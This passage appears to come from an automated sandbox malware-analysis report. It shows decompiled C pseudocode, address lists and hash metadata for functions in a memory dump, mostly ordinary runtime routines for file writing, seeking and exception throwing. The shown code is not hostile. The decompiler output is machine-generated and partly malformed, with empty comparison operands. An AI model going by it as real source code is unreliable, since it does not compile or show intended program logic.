                    				void* _t86;
                    				signed int _t91;
                    				intOrPtr _t92;
                    				signed int _t93;
                    				intOrPtr _t94;
                    				intOrPtr _t104;
                    				intOrPtr* _t110;
                    				intOrPtr _t114;
                    				intOrPtr* _t115;
                    				intOrPtr _t116;
                    				intOrPtr _t118;
                    				intOrPtr _t119;
                    				signed int _t121;
                    				char* _t122;
                    				void* _t123;
                    				void* _t124;
                    
                    				_t92 = __ecx;
                    				_push(0x34);
                    				_t61 = E013F26F6(E01415E25);
                    				_t119 = _t92;
                    				 *((intOrPtr*)(_t123 - 0x38)) = _t119;
                    				_t93 =  *(_t123 + 8);
                    				_t91 = __ebx | 0xffffffff;
                    				if((_t61 & 0xffffff00 | _t93 == _t91) == 0) {
                    					_t94 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x20))));
                    					if(_t94 == 0) {
                    						L5:
                    						if( *((intOrPtr*)(_t119 + 0x4c)) == 0) {
                    							L23:
                    							_t64 = _t91;
                    							L24:
                    							return E013F26B1(_t64);
                    						}
                    						E013C60BF(_t119);
                    						if( *((intOrPtr*)(_t119 + 0x38)) != 0) {
                    							_push(0);
                    							 *((intOrPtr*)(_t123 - 0x1c)) = 0;
                    							 *((char*)(_t123 - 0x2c)) = 0;
                    							 *((char*)(_t123 - 0x14)) =  *(_t123 + 8);
                    							 *((intOrPtr*)(_t123 - 0x18)) = 0xf;
                    							E013C6469(_t91, _t123 - 0x2c, _t110, 8);
                    							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                    							 *((intOrPtr*)(_t123 - 0x3c)) = _t119 + 0x40;
                    							while(1) {
                    								L9:
                    								_t116 =  *((intOrPtr*)(_t123 - 0x18));
                    								while(1) {
                    									_t99 =  >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c;
                    									_t112 =  >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c;
                    									_t72 =  *((intOrPtr*)(_t123 - 0x1c)) + ( >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c);
                    									_t76 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x38)))) + 0x1c))( *((intOrPtr*)(_t123 - 0x3c)), _t123 - 0x14, _t123 - 0x13, _t123 - 0x34,  >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c,  *((intOrPtr*)(_t123 - 0x1c)) + ( >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c), _t123 - 0x30);
                    									if(_t76 < 0) {
                    										break;
                    									}
                    									if(_t76 > 1) {
                    										if(_t76 == 3) {
                    											E013C2227( *((intOrPtr*)(_t123 - 0x14)),  *((intOrPtr*)( *((intOrPtr*)(_t123 - 0x38)) + 0x4c)));
                    											_t91 =  !=  ?  *(_t123 + 8) : _t91;
                    										}
                    										break;
                    									}
                    									_t116 =  *((intOrPtr*)(_t123 - 0x18));
                    									_t104 =  *((intOrPtr*)(_t123 - 0x2c));
                    									_t119 =  *((intOrPtr*)(_t123 - 0x38));
                    									_t81 =  >=  ? _t104 : _t123 - 0x2c;
                    									_t114 =  *((intOrPtr*)(_t123 - 0x30)) - ( >=  ? _t104 : _t123 - 0x2c);
                    									 *((intOrPtr*)(_t123 - 0x40)) = _t114;
                    									if(_t114 == 0) {
                    										L15:
                    										 *((char*)(_t119 + 0x3d)) = 1;
                    										if( *((intOrPtr*)(_t123 - 0x34)) != _t123 - 0x14) {
                    											_t91 =  *(_t123 + 8);
                    											break;
                    										}
                    										if(_t114 != 0) {
                    											continue;
                    										}
                    										if( *((intOrPtr*)(_t123 - 0x1c)) >= 0x20) {
                    											break;
                    										}
                    										_push(_t114);
                    										E013C6296(_t91, _t123 - 0x2c, _t114, _t116, 8);
                    										goto L9;
                    									}
                    									_t85 =  >=  ? _t104 : _t123 - 0x2c;
                    									_t86 = E013FE7EA(_t104,  >=  ? _t104 : _t123 - 0x2c, 1, _t114,  *((intOrPtr*)(_t119 + 0x4c)));
                    									_t114 =  *((intOrPtr*)(_t123 - 0x40));
                    									_t124 = _t124 + 0x10;
                    									if(_t114 != _t86) {
                    										break;
                    									}
                    									_t116 =  *((intOrPtr*)(_t123 - 0x18));
                    									goto L15;
                    								}
                    								E013C6118(_t123 - 0x2c, 1, 0);
                    								goto L23;
                    							}
                    						}
                    						_t121 =  *(_t123 + 8);
                    						E013C2227(_t121,  *((intOrPtr*)(_t119 + 0x4c))); // executed
                    						_t91 =  !=  ? _t121 : _t91;
                    						goto L23;
                    					}
                    					_t110 =  *((intOrPtr*)(_t119 + 0x30));
                    					_t118 =  *_t110;
                    					if(_t94 >= _t118 + _t94) {
                    						goto L5;
                    					}
                    					_t64 =  *(_t123 + 8);
                    					 *_t110 = _t118 - 1;
                    					_t115 =  *((intOrPtr*)(_t119 + 0x20));
                    					_t122 =  *_t115;
                    					 *_t115 = _t122 + 1;
                    					 *_t122 =  *(_t123 + 8);
                    					goto L24;
                    				}
                    				_t64 =  !=  ? _t93 : 0;
                    				goto L24;
                    			}





















                    0x013c7210
                    0x013c7210
                    0x013c7217
                    0x013c721c
                    0x013c721e
                    0x013c7221
                    0x013c7224
                    0x013c722e
                    0x013c723f
                    0x013c7243
                    0x013c726a
                    0x013c726e
                    0x013c739b
                    0x013c739b
                    0x013c739d
                    0x013c73a2
                    0x013c73a2
                    0x013c7276
                    0x013c7280
                    0x013c729d
                    0x013c729e
                    0x013c72a1
                    0x013c72a9
                    0x013c72ac
                    0x013c72b3
                    0x013c72b8
                    0x013c72bf
                    0x013c72c2
                    0x013c72c2
                    0x013c72c2
                    0x013c72c5
                    0x013c72da
                    0x013c72de
                    0x013c72e2
                    0x013c72f7
                    0x013c72fc
                    0x00000000
                    0x00000000
                    0x013c7305
                    0x013c7377
                    0x013c7382
                    0x013c738a
                    0x013c738e
                    0x00000000
                    0x013c7377
                    0x013c7307
                    0x013c730d
                    0x013c7316
                    0x013c7319
                    0x013c731c
                    0x013c731e
                    0x013c7321
                    0x013c7345
                    0x013c7348
                    0x013c734f
                    0x013c736f
                    0x00000000
                    0x013c736f
                    0x013c7353
                    0x00000000
                    0x00000000
                    0x013c735d
                    0x00000000
                    0x00000000
                    0x013c735f
                    0x013c7365
                    0x00000000
                    0x013c7365
                    0x013c732d
                    0x013c7333
                    0x013c7338
                    0x013c733b
                    0x013c7340
                    0x00000000
                    0x00000000
                    0x013c7342
                    0x00000000
                    0x013c7342
                    0x013c7396
                    0x00000000
                    0x013c7396
                    0x013c72c2
                    0x013c7285
                    0x013c7289
                    0x013c7292
                    0x00000000
                    0x013c7292
                    0x013c7245
                    0x013c7248
                    0x013c724f
                    0x00000000
                    0x00000000
                    0x013c7251
                    0x013c7257
                    0x013c7259
                    0x013c725c
                    0x013c7261
                    0x013c7263
                    0x00000000
                    0x013c7263
                    0x013c7234
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_
                    • String ID:
                    • API String ID: 2427045233-3916222277
                    • Opcode ID: 73e4aa32a46a104bf2ce2d318c5dd32b11e988e1c0c30c7b858180b3bdbb1442
                    • Instruction ID: 9220fc251f5bfcca21c69e7d215cd7c4e7e76f0850c6595c1ab2a0af57968a34
                    • Opcode Fuzzy Hash: 73e4aa32a46a104bf2ce2d318c5dd32b11e988e1c0c30c7b858180b3bdbb1442
                    • Instruction Fuzzy Hash: 4E513C31A0020ADFDF15CFA8C8819EEB7B6BF58718F14852EE952A7651E730AD45CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E013CBA40(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				char _v68;
                    				char _v76;
                    				char _v84;
                    				char _v92;
                    				char _v100;
                    				char _v108;
                    				char _v120;
                    				signed int _v124;
                    				intOrPtr _v192;
                    				char _v212;
                    				signed int _v216;
                    				intOrPtr _v280;
                    				intOrPtr _v284;
                    				char _v304;
                    				signed int _v308;
                    				intOrPtr _v348;
                    				intOrPtr _v352;
                    				intOrPtr _v356;
                    				intOrPtr _v360;
                    				intOrPtr _v364;
                    				intOrPtr _v376;
                    				signed int _t69;
                    				signed int _t70;
                    				intOrPtr _t73;
                    				void* _t74;
                    				signed int _t79;
                    				signed int _t80;
                    				intOrPtr _t83;
                    				void* _t84;
                    				signed int _t89;
                    				signed int _t90;
                    				intOrPtr _t93;
                    				void* _t94;
                    				signed int _t99;
                    				signed int _t100;
                    				intOrPtr _t103;
                    				void* _t104;
                    				intOrPtr _t108;
                    				void* _t110;
                    				void* _t113;
                    				void* _t116;
                    				void* _t118;
                    				intOrPtr* _t122;
                    				intOrPtr* _t123;
                    				intOrPtr* _t124;
                    				intOrPtr* _t125;
                    				intOrPtr _t142;
                    				intOrPtr _t146;
                    				intOrPtr _t148;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t152;
                    				signed int _t153;
                    				signed int _t158;
                    				signed int _t159;
                    				signed int _t160;
                    				signed int _t161;
                    
                    				_t120 = __ebx;
                    				_t150 = _t158;
                    				_push(0xffffffff);
                    				_push(E01416458);
                    				_push( *[fs:0x0]);
                    				_t159 = _t158 - 0x44;
                    				_t69 =  *0x1435234; // 0x78d9f939
                    				_t70 = _t69 ^ _t150;
                    				_v20 = _t70;
                    				_push(_t70);
                    				 *[fs:0x0] =  &_v16;
                    				_t142 = _a8;
                    				_t73 =  *__ecx;
                    				if( *((intOrPtr*)(_a4 + 0x10)) != 0) {
                    					_t74 =  *((intOrPtr*)(_t73 + 8))( &_v92);
                    					_t122 =  &_v68;
                    					_v16 = 0;
                    					E013CB3C0(__ebx, _t122, __eflags, _t74);
                    					E013F4EC6( &_v68, 0x1431604);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(_t150);
                    					_t151 = _t159;
                    					_push(0xffffffff);
                    					_push(E01416458);
                    					_push( *[fs:0x0]);
                    					_t160 = _t159 - 0x44;
                    					_t79 =  *0x1435234; // 0x78d9f939
                    					_t80 = _t79 ^ _t151;
                    					_v124 = _t80;
                    					_push(_t80);
                    					 *[fs:0x0] =  &_v120;
                    					__eflags =  *(_v100 + 0x10);
                    					_t83 =  *_t122;
                    					if(__eflags != 0) {
                    						_t84 =  *((intOrPtr*)(_t83 + 8))( &_v100);
                    						_t123 =  &_v76;
                    						_v24 = 0;
                    						E013CB3C0(__ebx, _t123, __eflags, _t84);
                    						E013F4EC6( &_v76, 0x1431604);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(_t151);
                    						_t152 = _t160;
                    						_push(0xffffffff);
                    						_push(E01416458);
                    						_push( *[fs:0x0]);
                    						_t161 = _t160 - 0x44;
                    						_t89 =  *0x1435234; // 0x78d9f939
                    						_t90 = _t89 ^ _t152;
                    						_v216 = _t90;
                    						_push(_t90);
                    						 *[fs:0x0] =  &_v212;
                    						__eflags =  *(_v192 + 0x10);
                    						_t93 =  *_t123;
                    						if(__eflags != 0) {
                    							_t94 =  *((intOrPtr*)(_t93 + 8))( &_v108);
                    							_t124 =  &_v84;
                    							_v32 = 0;
                    							E013CB3C0(__ebx, _t124, __eflags, _t94);
                    							E013F4EC6( &_v84, 0x1431604);
                    							asm("int3");
                    							asm("int3");
                    							_push(_t152);
                    							_t153 = _t161;
                    							_push(0xffffffff);
                    							_push(E01416458);
                    							_push( *[fs:0x0]);
                    							_t99 =  *0x1435234; // 0x78d9f939
                    							_t100 = _t99 ^ _t153;
                    							_v308 = _t100;
                    							_push(_t100);
                    							 *[fs:0x0] =  &_v304;
                    							_t146 = _v280;
                    							__eflags =  *(_v284 + 0x10);
                    							_t103 =  *_t124;
                    							if(__eflags != 0) {
                    								_t104 =  *((intOrPtr*)(_t103 + 8))( &_v108);
                    								_t125 =  &_v84;
                    								_v32 = 0;
                    								E013CB3C0(_t120, _t125, __eflags, _t104);
                    								E013F4EC6( &_v84, 0x1431604);
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								_t148 = _v376;
                    								_t108 =  *_t125;
                    								__eflags =  *(_t148 + 0x10);
                    								if( *(_t148 + 0x10) != 0) {
                    									_v364 = _t148;
                    									goto ( *((intOrPtr*)(_t108 + 0x88)));
                    								}
                    								return  *((intOrPtr*)(_t108 + 0x18))(_v360, _v356, _v352, _v348);
                    							} else {
                    								_t110 =  *((intOrPtr*)(_t103 + 0x14))(_t146, _v12, _v8, _v4);
                    								 *[fs:0x0] = _v40;
                    								__eflags = _v44 ^ _t153;
                    								return E013F268B(_t110, _v44 ^ _t153);
                    							}
                    						} else {
                    							_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x30))))(_v8, _v4);
                    							 *[fs:0x0] = _v32;
                    							__eflags = _v36 ^ _t152;
                    							return E013F268B(_t113, _v36 ^ _t152);
                    						}
                    					} else {
                    						_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x2c))))(_v0, _a4, _a8);
                    						 *[fs:0x0] = _v24;
                    						__eflags = _v28 ^ _t151;
                    						return E013F268B(_t116, _v28 ^ _t151);
                    					}
                    				} else {
                    					_t118 =  *((intOrPtr*)(_t73 + 0xc))(_t142);
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t118, _v20 ^ _t150);
                    				}
                    			}








































































                    0x013cba40
                    0x013cba41
                    0x013cba43
                    0x013cba45
                    0x013cba50
                    0x013cba51
                    0x013cba54
                    0x013cba59
                    0x013cba5b
                    0x013cba5e
                    0x013cba62
                    0x013cba6b
                    0x013cba72
                    0x013cba74
                    0x013cba99
                    0x013cba9d
                    0x013cbaa0
                    0x013cbaa7
                    0x013cbab5
                    0x013cbaba
                    0x013cbabb
                    0x013cbabc
                    0x013cbabd
                    0x013cbabe
                    0x013cbabf
                    0x013cbac0
                    0x013cbac1
                    0x013cbac3
                    0x013cbac5
                    0x013cbad0
                    0x013cbad1
                    0x013cbad4
                    0x013cbad9
                    0x013cbadb
                    0x013cbade
                    0x013cbae2
                    0x013cbaeb
                    0x013cbaef
                    0x013cbaf1
                    0x013cbb20
                    0x013cbb24
                    0x013cbb27
                    0x013cbb2e
                    0x013cbb3c
                    0x013cbb41
                    0x013cbb42
                    0x013cbb43
                    0x013cbb44
                    0x013cbb45
                    0x013cbb46
                    0x013cbb47
                    0x013cbb48
                    0x013cbb49
                    0x013cbb4a
                    0x013cbb4b
                    0x013cbb4c
                    0x013cbb4d
                    0x013cbb4e
                    0x013cbb4f
                    0x013cbb50
                    0x013cbb51
                    0x013cbb53
                    0x013cbb55
                    0x013cbb60
                    0x013cbb61
                    0x013cbb64
                    0x013cbb69
                    0x013cbb6b
                    0x013cbb6e
                    0x013cbb72
                    0x013cbb7b
                    0x013cbb7f
                    0x013cbb81
                    0x013cbbad
                    0x013cbbb1
                    0x013cbbb4
                    0x013cbbbb
                    0x013cbbc9
                    0x013cbbce
                    0x013cbbcf
                    0x013cbbd0
                    0x013cbbd1
                    0x013cbbd3
                    0x013cbbd5
                    0x013cbbe0
                    0x013cbbe4
                    0x013cbbe9
                    0x013cbbeb
                    0x013cbbee
                    0x013cbbf2
                    0x013cbbfb
                    0x013cbbfe
                    0x013cbc02
                    0x013cbc04
                    0x013cbc32
                    0x013cbc36
                    0x013cbc39
                    0x013cbc40
                    0x013cbc4e
                    0x013cbc53
                    0x013cbc54
                    0x013cbc55
                    0x013cbc56
                    0x013cbc57
                    0x013cbc58
                    0x013cbc59
                    0x013cbc5a
                    0x013cbc5b
                    0x013cbc5c
                    0x013cbc5d
                    0x013cbc5e
                    0x013cbc5f
                    0x013cbc60
                    0x013cbc64
                    0x013cbc66
                    0x013cbc6a
                    0x013cbc82
                    0x013cbc86
                    0x013cbc86
                    0x013cbc7f
                    0x013cbc06
                    0x013cbc10
                    0x013cbc16
                    0x013cbc21
                    0x013cbc2b
                    0x013cbc2b
                    0x013cbb83
                    0x013cbb8c
                    0x013cbb91
                    0x013cbb9c
                    0x013cbba6
                    0x013cbba6
                    0x013cbaf3
                    0x013cbaff
                    0x013cbb04
                    0x013cbb0f
                    0x013cbb19
                    0x013cbb19
                    0x013cba76
                    0x013cba77
                    0x013cba7d
                    0x013cba92
                    0x013cba92

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CBAB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: dafcc20ab03e3a90c32fd1420f6d82237b1cf11ff0f5eb9359ebcf247d5bcf2b
                    • Instruction ID: 7eaf908d901c09b91b9d99417b0e6c206f425545a3ba142e790deffef30ae864
                    • Opcode Fuzzy Hash: dafcc20ab03e3a90c32fd1420f6d82237b1cf11ff0f5eb9359ebcf247d5bcf2b
                    • Instruction Fuzzy Hash: 6A715A71904209EFCB01DFA4D944F9EB7B9FB08B14F10866EF9169B260DB75E904CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E014081B5(signed int _a4, void* _a8, signed int _a12) {
                    				signed int _v8;
                    				long _v12;
                    				struct _OVERLAPPED* _v16;
                    				long _v20;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				intOrPtr _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t62;
                    				intOrPtr _t66;
                    				signed char _t68;
                    				signed int _t69;
                    				signed int _t71;
                    				signed int _t73;
                    				signed int _t74;
                    				signed int _t77;
                    				intOrPtr _t79;
                    				signed int _t81;
                    				signed int _t85;
                    				signed int _t88;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t106;
                    				intOrPtr _t108;
                    				signed int _t113;
                    				signed int _t115;
                    				void* _t116;
                    				signed int _t118;
                    				signed int _t120;
                    				signed int _t122;
                    				void* _t123;
                    
                    				_t62 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t62 ^ _t122;
                    				_t106 = _a12;
                    				_v12 = _t106;
                    				_t118 = _a4;
                    				_t116 = _a8;
                    				_v52 = _t116;
                    				if(_t106 != 0) {
                    					__eflags = _t116;
                    					if(_t116 != 0) {
                    						_t102 = _t118 >> 6;
                    						_t115 = (_t118 & 0x0000003f) * 0x30;
                    						_v32 = _t102;
                    						_t66 =  *((intOrPtr*)(0x143a740 + _t102 * 4));
                    						_v48 = _t66;
                    						_v28 = _t115;
                    						_t103 =  *((intOrPtr*)(_t66 + _t115 + 0x29));
                    						__eflags = _t103 - 2;
                    						if(_t103 == 2) {
                    							L6:
                    							_t68 =  !_t106;
                    							__eflags = _t68 & 0x00000001;
                    							if((_t68 & 0x00000001) != 0) {
                    								_t66 = _v48;
                    								L9:
                    								__eflags =  *(_t66 + _t115 + 0x28) & 0x00000020;
                    								if(__eflags != 0) {
                    									E01408E19(_t118, 0, 0, 2);
                    									_t123 = _t123 + 0x10;
                    								}
                    								_t69 = E01407D5A(_t103, _t115, __eflags, _t118);
                    								__eflags = _t69;
                    								if(_t69 == 0) {
                    									_t108 =  *((intOrPtr*)(0x143a740 + _v32 * 4));
                    									_t71 = _v28;
                    									__eflags =  *(_t108 + _t71 + 0x28) & 0x00000080;
                    									if(( *(_t108 + _t71 + 0x28) & 0x00000080) == 0) {
                    										_v24 = 0;
                    										_v20 = 0;
                    										_v16 = 0;
                    										_t73 = WriteFile( *(_t108 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
                    										__eflags = _t73;
                    										if(_t73 == 0) {
                    											_v24 = GetLastError();
                    										}
                    										goto L28;
                    									}
                    									_t85 = _t103;
                    									__eflags = _t85;
                    									if(_t85 == 0) {
                    										E01407DD0( &_v24, _t118, _t116, _v12);
                    										goto L17;
                    									}
                    									_t88 = _t85 - 1;
                    									__eflags = _t88;
                    									if(_t88 == 0) {
                    										_t87 = E01407F9D( &_v24, _t118, _t116, _v12);
                    										goto L17;
                    									}
                    									__eflags = _t88 != 1;
                    									if(_t88 != 1) {
                    										goto L34;
                    									}
                    									_t87 = E01407EAF( &_v24, _t118, _t116, _v12);
                    									goto L17;
                    								} else {
                    									__eflags = _t103;
                    									if(_t103 == 0) {
                    										_t87 = E01407B3A( &_v24, _t118, _t116, _v12);
                    										L17:
                    										L15:
                    										L28:
                    										asm("movsd");
                    										asm("movsd");
                    										asm("movsd");
                    										_t74 = _v40;
                    										__eflags = _t74;
                    										if(_t74 != 0) {
                    											_t75 = _t74 - _v36;
                    											__eflags = _t74 - _v36;
                    											L40:
                    											L41:
                    											return E013F268B(_t75, _v8 ^ _t122);
                    										}
                    										_t77 = _v44;
                    										__eflags = _t77;
                    										if(_t77 == 0) {
                    											_t116 = _v52;
                    											L34:
                    											_t113 = _v28;
                    											_t79 =  *((intOrPtr*)(0x143a740 + _v32 * 4));
                    											__eflags =  *(_t79 + _t113 + 0x28) & 0x00000040;
                    											if(( *(_t79 + _t113 + 0x28) & 0x00000040) == 0) {
                    												L37:
                    												 *((intOrPtr*)(E013FDB3A())) = 0x1c;
                    												_t81 = E013FDB27();
                    												 *_t81 =  *_t81 & 0x00000000;
                    												__eflags =  *_t81;
                    												L38:
                    												_t75 = _t81 | 0xffffffff;
                    												goto L40;
                    											}
                    											__eflags =  *_t116 - 0x1a;
                    											if( *_t116 != 0x1a) {
                    												goto L37;
                    											}
                    											_t75 = 0;
                    											goto L40;
                    										}
                    										_t120 = 5;
                    										__eflags = _t77 - _t120;
                    										if(_t77 != _t120) {
                    											_t81 = E013FDB04(_t77);
                    										} else {
                    											 *((intOrPtr*)(E013FDB3A())) = 9;
                    											_t81 = E013FDB27();
                    											 *_t81 = _t120;
                    										}
                    										goto L38;
                    									}
                    									__eflags = _t103 - 1 - 1;
                    									if(_t103 - 1 > 1) {
                    										goto L34;
                    									}
                    									E01407CED( &_v24, _t116, _v12);
                    									goto L15;
                    								}
                    							}
                    							 *(E013FDB27()) =  *_t95 & 0x00000000;
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							_t81 = E013FDA61();
                    							goto L38;
                    						}
                    						__eflags = _t103 - 1;
                    						if(_t103 != 1) {
                    							goto L9;
                    						}
                    						goto L6;
                    					}
                    					 *(E013FDB27()) =  *_t97 & _t116;
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					_t75 = E013FDA61() | 0xffffffff;
                    					goto L41;
                    				}
                    				_t75 = 0;
                    				goto L41;
                    			}








































                    0x014081bd
                    0x014081c4
                    0x014081c7
                    0x014081ca
                    0x014081ce
                    0x014081d2
                    0x014081d5
                    0x014081da
                    0x014081e3
                    0x014081e5
                    0x0140820b
                    0x01408211
                    0x01408214
                    0x01408217
                    0x0140821e
                    0x01408221
                    0x01408224
                    0x01408228
                    0x0140822b
                    0x01408232
                    0x01408234
                    0x01408236
                    0x01408238
                    0x01408257
                    0x0140825a
                    0x0140825a
                    0x0140825f
                    0x01408268
                    0x0140826d
                    0x0140826d
                    0x01408271
                    0x01408277
                    0x01408279
                    0x014082b7
                    0x014082be
                    0x014082c1
                    0x014082c6
                    0x01408315
                    0x01408318
                    0x0140831b
                    0x01408327
                    0x0140832d
                    0x0140832f
                    0x01408337
                    0x01408337
                    0x00000000
                    0x0140833a
                    0x014082cb
                    0x014082cb
                    0x014082ce
                    0x01408307
                    0x00000000
                    0x01408307
                    0x014082d0
                    0x014082d0
                    0x014082d3
                    0x014082f7
                    0x00000000
                    0x014082f7
                    0x014082d5
                    0x014082d8
                    0x00000000
                    0x00000000
                    0x014082e7
                    0x00000000
                    0x0140827b
                    0x0140827b
                    0x0140827d
                    0x014082aa
                    0x014082af
                    0x0140829a
                    0x0140833d
                    0x01408340
                    0x01408341
                    0x01408342
                    0x01408343
                    0x01408346
                    0x01408348
                    0x014083ad
                    0x014083ad
                    0x014083b0
                    0x014083b1
                    0x014083c0
                    0x014083c0
                    0x0140834a
                    0x0140834d
                    0x0140834f
                    0x01408375
                    0x01408378
                    0x0140837b
                    0x0140837e
                    0x01408385
                    0x0140838a
                    0x01408395
                    0x0140839a
                    0x014083a0
                    0x014083a5
                    0x014083a5
                    0x014083a8
                    0x014083a8
                    0x00000000
                    0x014083a8
                    0x0140838c
                    0x0140838f
                    0x00000000
                    0x00000000
                    0x01408391
                    0x00000000
                    0x01408391
                    0x01408353
                    0x01408354
                    0x01408356
                    0x0140836d
                    0x01408358
                    0x0140835d
                    0x01408363
                    0x01408368
                    0x01408368
                    0x00000000
                    0x01408356
                    0x01408281
                    0x01408284
                    0x00000000
                    0x00000000
                    0x01408292
                    0x00000000
                    0x01408297
                    0x01408279
                    0x0140823f
                    0x01408247
                    0x0140824d
                    0x00000000
                    0x0140824d
                    0x0140822d
                    0x01408230
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01408230
                    0x014081ec
                    0x014081f3
                    0x014081fe
                    0x00000000
                    0x014081fe
                    0x014081dc
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8bd28f2e67d7e6bd141d252546f551c36afcdb995a1e8a33ababbea6d1a4fa63
                    • Instruction ID: 5c3157e5719c428a52d0304978b7635a6d31aae58f439614d32ee0129893e2e1
                    • Opcode Fuzzy Hash: 8bd28f2e67d7e6bd141d252546f551c36afcdb995a1e8a33ababbea6d1a4fa63
                    • Instruction Fuzzy Hash: DC51A171D0020B9BDF239FAACA48EAF7BB4AF95314F14016EE501A72F1D7759902CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E01408D80(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				void* _v12;
                    				void* _t15;
                    				int _t16;
                    				signed int _t19;
                    				signed int _t32;
                    				signed int _t33;
                    				signed int _t36;
                    
                    				_t36 = _a4;
                    				_push(_t32);
                    				_t15 = E0140DD90(_t36);
                    				_t33 = _t32 | 0xffffffff;
                    				if(_t15 != _t33) {
                    					_push(_a16);
                    					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
                    					if(_t16 != 0) {
                    						if((_v12 & _v8) == _t33) {
                    							goto L2;
                    						} else {
                    							_t19 = _v12;
                    							_t39 = (_t36 & 0x0000003f) * 0x30;
                    							 *( *((intOrPtr*)(0x143a740 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x143a740 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                    						}
                    					} else {
                    						E013FDB04(GetLastError());
                    						goto L2;
                    					}
                    				} else {
                    					 *((intOrPtr*)(E013FDB3A())) = 9;
                    					L2:
                    					_t19 = _t33;
                    				}
                    				return _t19;
                    			}











                    0x01408d88
                    0x01408d8b
                    0x01408d8d
